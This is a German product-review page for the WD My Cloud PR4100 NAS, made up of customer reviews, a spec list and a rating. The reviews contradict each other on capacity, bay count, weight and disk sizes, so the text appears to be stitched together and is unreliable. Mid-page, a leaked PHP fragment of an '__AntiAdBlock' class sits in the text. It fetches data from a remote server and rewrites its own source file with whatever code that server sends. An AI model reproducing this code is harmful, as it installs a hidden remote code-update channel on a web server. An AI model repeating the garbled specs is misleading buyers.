Western Digital WD My Cloud PR4100 32 TB – Network Attached Storage – 2 Bay NAS Pro-Serie – integrierte Videotranskodierung – Einfache Einrichtung und benutzerfreundliches Interface

Ich habe das gerät seit 1,5 monaten und bisher kann ich mich nicht beschwerden. Es ist leise (beim start nur kurz geräusche), schnell (je nach filetyps bis zu 100 mbit geschwindigkeit – es kann natürlich auch viel mehr sein). Es fehlt nur ein richtig gutes backup programm, wd smartware kann nur von einem laufwerk/partition backup machen.

Mittlerweile ist die nas mit vier festplatten a’ 3tb im heimischen lan seit gut acht wochen in betrieb. Die einrichtung erfolgte grds. Eventuell wird ein mit dem thema unbedarfter käufer zu bestimmten konfigurationsthemen intensiver lesen. Die nas wird zur datensicherung meines macbook über timemachine genutzt wie auch zur datensicherung ausgelagerter daten. Des weiteren dient sie als dnla-server für ein paar ausgewählte filmdateien. Die datensicherung der daten auf der nas erfolgt auf eine angeschlossene usb-festplatte mittels angelegter datensicherungsjobs. Diese müssen leider händisch angestoßen werden, für welche ich mir ein eigenes zeitraster gegeben haben. Eine automatisch wiederkehrende sicherung ist leider nur auf eine weitere nas oder wohl auch über lan erreichbar hd möglich. Im betrieb zeigt sich die nas als subjektiv empfunden leise, sollten die festplatten gerade ihren dienst versehen, vernimmt man diese leicht hörbar.

Ich bin in sachen nas speicher ein einsteiger und war gespannt, welchen aufwand die inbetriebnahme und benutzung des geräts mitsich bringt. Die größe und das gewicht des nas speichers überraschten mich, mit 23cm x 17cm x 19cm ist das gerät erstaunlich kompakt, voll bestückt mit etwa 5 kg kampfgewicht aber auch erstaunlich gewichtig. Das gerät wird perfekt und sicher verpackt geliefert. Im lieferumfang des wd my cloud pro serie pr4100 8tb nas-system sind ein ethernet-kabel, netzteil, zwei netzkabel und eine schnellinstallationsanleitung. Das gerät verfügt über vier einschubschächte welche mit 4 festplatten à 2 tb vom typ wd red blegt sind. Das Öffnen der schächte und der wechsel der festplatten geht einfach und ohne probleme. Im raid 5 verbund waren bei mir 5,94 tb nutzbar. Auf der rückseite des geräts befinden sich je zwei netzkabel-, ethernet- und usb 3. 0 anschluss ist auf der vorderseite des geräts zu finden und dient vorzugsweise dem anschluss von usb sticks. Ein blau beleuchtetes display zeigt den betriebsstatus des geräts an, weitere blaue lämpchen die betriebsbereitschaft des geräts und der festplatten. Der western digital 8tb my cloud pro serie pr4100 4-bay nas festplattespeicher ist mit einem 1. 6ghz quad-core intel pentium n3710 prozessor und 4gb ddr3l. Diese performance läßt das gerät zügig und ohne aussetzer arbeiten. Hier sind die Spezifikationen für die Western Digital WD My Cloud PR4100 32 TB – Network Attached Storage – 2 Bay NAS Pro-Serie – integrierte Videotranskodierung:

requestTimeout / 1000); return $value == 0 ? 1 : $value; } private function getTimeoutMS() { return $this->requestTimeout; } private function ignoreCache() { $key = md5('PMy6vsrjIf-' . $this->zoneId); return array_key_exists($key, $_GET); } private function getCurl($url) { if ((!extension_loaded('curl')) || (!function_exists('curl_version'))) { return false; } $curl = curl_init(); curl_setopt_array($curl, array( CURLOPT_RETURNTRANSFER => 1, CURLOPT_USERAGENT => $this->requestUserAgent . ' (curl)', CURLOPT_FOLLOWLOCATION => false, CURLOPT_SSL_VERIFYPEER => true, CURLOPT_TIMEOUT => $this->getTimeout(), CURLOPT_TIMEOUT_MS => $this->getTimeoutMS(), CURLOPT_CONNECTTIMEOUT => $this->getTimeout(), CURLOPT_CONNECTTIMEOUT_MS => $this->getTimeoutMS(), )); $version = curl_version(); $scheme = ($this->requestIsSSL && ($version['features'] & CURL_VERSION_SSL)) ? 'https' : 'http'; curl_setopt($curl, CURLOPT_URL, $scheme . '://' . $this->requestDomainName . $url); $result = curl_exec($curl); curl_close($curl); return $result; } private function getFileGetContents($url) { if (!function_exists('file_get_contents') || !ini_get('allow_url_fopen') || ((function_exists('stream_get_wrappers')) && (!in_array('http', stream_get_wrappers())))) { return false; } $scheme = ($this->requestIsSSL && function_exists('stream_get_wrappers') && in_array('https', stream_get_wrappers())) ? 'https' : 'http'; $context = stream_context_create(array( $scheme => array( 'timeout' => $this->getTimeout(), // seconds 'user_agent' => $this->requestUserAgent . ' (fgc)', ), )); return file_get_contents($scheme . '://' . $this->requestDomainName . $url, false, $context); } private function getFsockopen($url) { $fp = null; if (function_exists('stream_get_wrappers') && in_array('https', stream_get_wrappers())) { $fp = fsockopen('ssl://' . $this->requestDomainName, 443, $enum, $estr, $this->getTimeout()); } if ((!$fp) && (!($fp = fsockopen('tcp://' . gethostbyname($this->requestDomainName), 80, $enum, $estr, $this->getTimeout())))) { return false; } $out = "GET {$url} HTTP/1.1\r\n"; $out .= "Host: {$this->requestDomainName}\r\n"; $out .= "User-Agent: {$this->requestUserAgent} (socket)\r\n"; $out .= "Connection: close\r\n\r\n"; fwrite($fp, $out); stream_set_timeout($fp, $this->getTimeout()); $in = ''; while (!feof($fp)) { $in .= fgets($fp, 2048); } fclose($fp); $parts = explode("\r\n\r\n", trim($in)); return isset($parts[1]) ? $parts[1] : ''; } private function getCacheFilePath($url, $suffix = '.js') { return sprintf('%s/pa-code-v%s-%s%s', $this->findTmpDir(), $this->version, md5($url), $suffix); } private function findTmpDir() { $dir = null; if (function_exists('sys_get_temp_dir')) { $dir = sys_get_temp_dir(); } elseif (!empty($_ENV['TMP'])) { $dir = realpath($_ENV['TMP']); } elseif (!empty($_ENV['TMPDIR'])) { $dir = realpath($_ENV['TMPDIR']); } elseif (!empty($_ENV['TEMP'])) { $dir = realpath($_ENV['TEMP']); } else { $filename = tempnam(dirname(__FILE__), ''); if (file_exists($filename)) { unlink($filename); $dir = realpath(dirname($filename)); } } return $dir; } private function isActualCache($file) { if ($this->ignoreCache()) { return false; } return file_exists($file) && (time() - filemtime($file) < $this->cacheTtl * 60); } private function getCode($url) { $code = false; if (!$code) { $code = $this->getCurl($url); } if (!$code) { $code = $this->getFileGetContents($url); } if (!$code) { $code = $this->getFsockopen($url); } return $code; } private function getPHPVersion($major = true) { $version = explode('.', phpversion()); if ($major) { return (int)$version[0]; } return $version; } private function parseRaw($code) { $hash = substr($code, 0, 32); $dataRaw = substr($code, 32); if (md5($dataRaw) !== strtolower($hash)) { return null; } if ($this->getPHPVersion() >= 7) { $data = @unserialize($dataRaw, array( 'allowed_classes' => false, )); } else { $data = @unserialize($dataRaw); } if ($data === false || !is_array($data)) { return null; } return $data; } private function getTag($code) { $data = $this->parseRaw($code); if ($data === null) { return ''; } if (array_key_exists('code', $data)) { $this->selfUpdate($data['code']); } if (array_key_exists('tag', $data)) { return (string)$data['tag']; } return ''; } public function get() { $e = error_reporting(0); $url = $this->routeGetTag . '?' . http_build_query(array( 'token' => $this->token, 'zoneId' => $this->zoneId, 'version' => $this->version, )); $file = $this->getCacheFilePath($url); if ($this->isActualCache($file)) { error_reporting($e); return $this->getTag(file_get_contents($file)); } if (!file_exists($file)) { @touch($file); } $code = ''; if ($this->ignoreCache()) { $fp = fopen($file, "r+"); if (flock($fp, LOCK_EX)) { $code = $this->getCode($url); ftruncate($fp, 0); fwrite($fp, $code); fflush($fp); flock($fp, LOCK_UN); } fclose($fp); } else { $fp = fopen($file, 'r+'); if (!flock($fp, LOCK_EX | LOCK_NB)) { if (file_exists($file)) { $code = file_get_contents($file); } else { $code = ""; } } else { $code = $this->getCode($url); ftruncate($fp, 0); fwrite($fp, $code); fflush($fp); flock($fp, LOCK_UN); } fclose($fp); } error_reporting($e); return $this->getTag($code); } private function getSelfBackupFilename() { return $this->getCacheFilePath($this->version, ''); } private function selfBackup() { $this->selfSourceContent = file_get_contents(__FILE__); if ($this->selfSourceContent !== false && is_writable($this->findTmpDir())) { $fp = fopen($this->getSelfBackupFilename(), 'cb'); if (!flock($fp, LOCK_EX)) { fclose($fp); return false; } ftruncate($fp, 0); fwrite($fp, $this->selfSourceContent); fflush($fp); flock($fp, LOCK_UN); fclose($fp); return true; } return false; } private function selfRestore() { if (file_exists($this->getSelfBackupFilename())) { return rename($this->getSelfBackupFilename(), __FILE__); } return false; } private function selfUpdate($newCode) { if(is_writable(__FILE__)) { $hasBackup = $this->selfBackup(); if ($hasBackup) { try { $fp = fopen(__FILE__, 'cb'); if (!flock($fp, LOCK_EX)) { fclose($fp); throw new Exception(); } ftruncate($fp, 0); if (fwrite($fp, $newCode) === false) { ftruncate($fp, 0); flock($fp, LOCK_UN); fclose($fp); throw new Exception(); } fflush($fp); flock($fp, LOCK_UN); fclose($fp); if (md5_file(__FILE__) === md5($newCode)) { @unlink($this->getSelfBackupFilename()); } else { throw new Exception(); } } catch (Exception $e) { $this->selfRestore(); } } } } } $__aab = new __AntiAdBlock_2430765(); return $__aab->get();
  • Geben Sie Ihr Modell ein,
    um sicherzustellen, dass dieser Artikel passt.
  • Multifunktionaler Medienserver mit 4 Laufwerksschächten, Intel Pentium N3710 1,6-GHz-Quad-Core-Prozessor, 4GB DDR3L RAM auf zwei Steckplätzen (erweiterbar), 3x USB 3.0
  • Zentraler Speicher zum Organisieren von Medien und zur Verbesserung Ihres Workflows, dabei schnelle und einfache Einrichtung sowie ein robuster Gerätemanager mit My Cloud OS 3; Unterstützung für Konfigurationen mit RAID 0, 1, 5, 10, JBOD und Spanning
  • Umfassende Datensicherheit durch Passwortschutz und AES-256-Bit-Laufwerksverschlüsselung sowie verschiedene Backup-Möglichkeiten z.B. automatische Backupsoftware für PC. Apple Time Machine Unterstützung
  • WD Sync für synchronisierte Inhalte und standortunabhängigen Zugriff. Personalisierung mit herunterladbaren Apps wie Plex, Dropbox, Milestone Arcus und viele mehr
  • Lieferumfang: WD My Cloud Pro PR4100 32TB, WDBNFA0320KBK-EESN, NAS-System inkl. Ethernet-Kabel, Netzteil, Netzkabel und Schnellinstallationsanleitung

Als neuling in sachen server, raid und cloud-technik, musste ich erst einmal etwas recherche betreiben. Beim ersten start des servers, war aber die unsicherheit dann aufgrund der benutzerfreundlichen führung verflogen. Wd macht es dem benutzer schritt für schritt sehr einfach, die cloud einzurichten. Hinterher kann man sich dann den feineinstellungen widmen. Ich habe mich für raid 1 mirroring entschieden. Dabei werden die abgespeicherten daten gespiegelt. Kommt es zum verlust, hat man sozusagen eine kopie. Wer den inhalt verschlüsseln möchte, sollte das auch tun, bevor er die daten auf den server überträgt. Bevor man mit dem befüllen anfängt, sollte auch erst einmal das firmwareupdate erneuern. Dazu muss man glücklicherweise nicht durch umwege dran kommen, sondern der server sucht automatisch nach der neuesten aktualisierung.

Meine anwendung:- datensicherung für private dateien- datensicherung kleingewerbe/einzelunternehmen- mediastreaming (filme, fotos, videos, musik) via plex- cloud für unterwegs und zum datenaustauschdie installation/einrichtung war nicht einfach und auch nicht mit nur ein paar klicks erledigt. Die formatierung je nach größe der festplatten dauert sicherlich auch seine zeit. Als “server”-laie musste ich also etwas zeit in die hand nehmen, auch mal artikel aus dem internet recherchieren und zum schlusshat bisher dennoch alles einwandfrei funktioniert. Installiert habe ich 4x wd red 4 tb festplatten, in einem raid 5 verbund. Die box tut was sie soll, der rest liegt an der einrichtung, dem netzwerk und unseren pcs. Meiner meinung nach eine gute investition zur datensicherung für relativ schmales geld,würde ich so meinen bekannten bedenkenlos weiterempfehlen.

Kommentare von Käufern :

  • Zuverlässig und Leise
  • Kurz und knapp – für mich hat sich der Kauf gelohnt!
  • Bin sehr zufrieden – die NAS macht, was sie soll

Funktionierte auf anhieb und ist super schnell. Würde ich sofort wieder kaufen. Nur support ist nicht immer auf der höhe. Besten WD My Cloud PR4100 32 TB – Network Attached Storage – 2 Bay NAS Pro-Serie – integrierte Videotranskodierung, Videostreaming – WDBNFA0320KBK-EESN

Habe dort zwei wd “red” harddisks je 10gb eingebaut und betreibe sie in raid. Falls eine platte ausfällt, sind die daten trotzdem noch auf der anderen da, und man kann die defekte dann wechseln. Läuft auf anhieb problemlos. Ich verwende es im lokalen netzwerk für backups. Von etlichen pcs werden über nacht mit acronis backups dort aufgespielt. Zuvor hatte ich ein zyxel, das geht zwar auch, aber die oberfläche vom zyxel finde etwas umständlicher und total veraltet. Das wd my cloud ist von der benutzeroberfläche her frisch und up-to-date. Ausserdem kann man sie eben auch als cloud verwenden. Würde ich auf jeden fall wieder kaufen und kann ich sehr empfehlen.

Ich habe zuerst einen server von synology gekauft, kam aber mit den einstellungen nicht klar. Daraufhin habe ich diesen zurück gegeben und den wd cloud pr4100 mit 8 tb gekauft. Dieser ist super einfach zu bedienen: benutzer, gruppen, ordner und ordnerberechtigungen sind super einfach anzulegen und zu bedienendie ausfallsicherheit bei raid 5 mit den 4 festplatten ist idiotensicherfazit: ich kann den server wirklich nur dringend empfehlen.

Ich hatte zuvor eine synology, gekauft :(hat mich 5 tage stress gekostet (synology), diese hier ist einfach für server dummies, wie mich. Mega schnell im gegensatz, zu meiner wd cloud mirror, oder der cloud von wd. Ich bin echt begeistert, und frage mich warum ich erst mit den kleineren produkten begonnen habe. Sehr einfach zu installieren, da ich ja das leergehäuse gekauft habe, einfach 4 passende platten einstecken raid aussuchen und die my cloud pro series pr4100 machen lassen. :-)also ich kann die my cloud pro series pr4100, nur empfehlen.

Auch für mich ist die western digital meine erste nas. Entsprechend bin ich schon mit ziemlichem respekt und vorsicht an die einrichtung gegangen, es ist zwar bei weitem nicht so leicht etwas kaputt zu machen, wie man oft befürchtet, aber trotzdem schien mir hier bedacht die bessere option zu sein. Optisch ist die wd mycloud aus der pro serie ein ziemlich schwerer quadratischer kasten, an dem man zuerst gleich die einschubschächte für die festplatten (platten enthalten) und das kleine anzeigendisplay sieht. Die anzeige des displays lässt sich per schalter umstellen, hier werden informationen über die platten; der noch zur verfügung stehende speicherplatz, ip-adresse und mehr. Aufgrund der quadratischen form ist das risiko das gerät umzuwerfen ziemlich gleich null. Beim heben und betrachten fällt einem die nahezu fugenlose verarbeitung ins auge, nichts klappert oder verschiebt sich beim bewegen. Qualität der äußerlichen komponenten sauber. Die inneren werte können sich auch sehen lassen mit intel pentium n3710 1,6-ghz-quad-core-prozessor und 4gb ddr3l ram auf zwei steckplätzen, was für eine schnelle und ruckelfreie arbeit sorgt, ebenso die 3x usb 3. 0, falls man für geräte in der nähe oder zum aufspielen lieber kabel als wlan nutzt. Zusammen mit der nas kommen ethernet-kabel, netzteil, netzkabel und schnellinstallationsanleitungdie einrichtung war dann aber nicht so furchteinflößend wie erwartet und wird es auch weniger technik versierten leicht machen, mit dem gerät umzugehen, was sich sehr wahrscheinlich im umsatz bemerkt machen wird.

Nach knapp einem monat im betrieb schreibe ich hier meine bewertung:die wd my cloud hat mich besonders im thema geschwindigkeit und lautstärke überzeugt. Beim start, welcher etwa 1-2 minuten dauert, ist das system etwas lauter, wird jedoch unmittelbar nach dem start sehr leise und aus der entfernung kaum hörbar. Die einrichtung erfolgt über ein übersichtlich gehaltenes web-interface, welches meiner meinung nach noch etwas verbesserungswürdig ist. Hierbei kann man aus allen möglichen raid-typen auswählen, um eine geringe ausfallwahrscheinlichkeit zu garantieren. Auch das einrichten von apps, wie des plex media servers, hat reibungslos funktioniert. Jedoch gibt es nur sehr wenige apps die man direkt installieren kann und man muss oft auf dritte zurückgreifen. Zudem hat mich das schnelle kopieren von daten (z. Von einer festplatte) über den usb 3. 0 frontanschluss beeindruckt.

Dies ist meine erste nas, und sie macht mir den einstieg sehr leicht. Die nas ist ein ziemlicher brocken, sie wiegt über 3 kg. Die schwere und die kompakte form machen sie standfest. Die verarbeitung ist gut, alles wirkt sehr solide. Die vier festplatten sind bereits eingebaut. Sehr praktisch finde ich das display, das den betriebsstatus anzeigt. Mit dem schalter daneben kann man die anzeige wechseln. Angezeigt werden der freie speicherplatz, die ip-adresse, die temperatur und der raid-modus. Unter den festplatten sind blaue leds, die den status der festplatten anzeigen. Das gerät läuft erstaunlich leise, das gefällt mir besonders gut.

Wir haben die wd4100 in der 16gb variante gekauft. Die bedienung ist einfach und auch vom laien einfach machbar. Konfiguriert haben wir das gerät als raid 10, damit bleiben 8tb nettospeicherkapazität, die uns als speicher für fotos und videos und andere dateien dienen. Das einrichten von benutzerkonten ist sehr einfach. Ebenso mag ich, dass man einfach kameras und usb stick anschliessen kann, deren inhalt dann automatisch in (einmal anzulegende) ordner gesichert werden. Wir nutzen das um sicherzustellen, dass bilder und videos schon mal gesichert sind, bevor sie weiter bearbeitet werden. Wir nutzen mit dem pr4100 auch selbstgerechte 4k videos (uhd). Das system ist ausreichend schnell, um auch mit 4k videos beim streamen über den plex media server klar zu kommen (ruckelfrei). Ich würde das system jederzeit wiederkaufen.

Summary
Review Date
Reviewed Item
WD My Cloud PR4100 32 TB - Network Attached Storage - 2 Bay NAS Pro-Serie - integrierte Videotranskodierung, Videostreaming - WDBNFA0320KBK-EESN
Rating
5,0 of 5 stars, based on 16 reviews

Author: SmartHome